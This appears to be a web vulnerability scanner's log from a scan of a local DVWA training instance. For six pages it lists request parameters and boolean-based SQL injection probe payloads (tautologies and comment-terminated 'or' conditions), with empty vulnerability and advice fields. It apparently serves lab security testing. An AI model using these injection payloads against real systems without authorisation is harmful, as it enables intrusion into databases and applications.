Target: http://localhost/dvwa/ (GET)

---
URL:http://localhost/dvwa/setup.php (POST)
VulnName: 
Query: {'user_token': 'ba6d9a69d9073041f5b1efbc6003a858', 'create_db': 'Create / Reset Database'}
Payload: "+and+"96260"="96260
"+and+"41460"="41460
"+or+58076=58076#
"+and+"12346"="12347
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/brute/ (POST)
VulnName: 
Query: {'username': 'cntvalue', 'user_token': 'd65cf5598d8aeec8031b57cc8f6108ff', 'Login': 'Login', 'password': 'cntvalue'}
Payload: '+and+'24505'='24505
'+and+'41910'='41910
'+or+84878=84878#
'+and+'31921'='31922
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/exec/ (POST)
VulnName: 
Query: {'ip': 'cntvalue', 'Submit': 'Submit', 'user_token': 'f9a240746ed556276790bfcc633cff56'}
Payload: 	and	36817=36817
	and	75215=75215
	or	61798=61798#
	and	94863=94864
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/xss_r/ (GET)
VulnName: 
Query: {'user_token': 'a2e8644d0a380b24a70b08fceb6c40a2', 'name': 'cntvalue'}
Payload: +and+18494=18494
+and+40394=40394
+or+60972=60972#
+and+61157=61158
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/sqli_blind/ (GET)
VulnName: 
Query: {'user_token': '68e636477e9f00f7b948ccd9d2f4c346', 'id': 'cntvalue', 'Submit': 'Submit'}
Payload: +and+18494=18494
+and+40394=40394
+or+60972=60972#
+and+61157=61158
Advice: 
---
---
URL:http://localhost/dvwa/vulnerabilities/csrf/ (GET)
VulnName: 
Query: {'password_new': 'cntvalue', 'password_current': 'cntvalue', 'password_conf': 'cntvalue', 'Change': 'Change', 'user_token': 'f2ccba82c23a66afb2239dc52cacf576'}
Payload: '	and	'19148'='19148
'	and	'56258'='56258
'	or	44929=44929#
'	and	'84159'='84160
Advice: 
---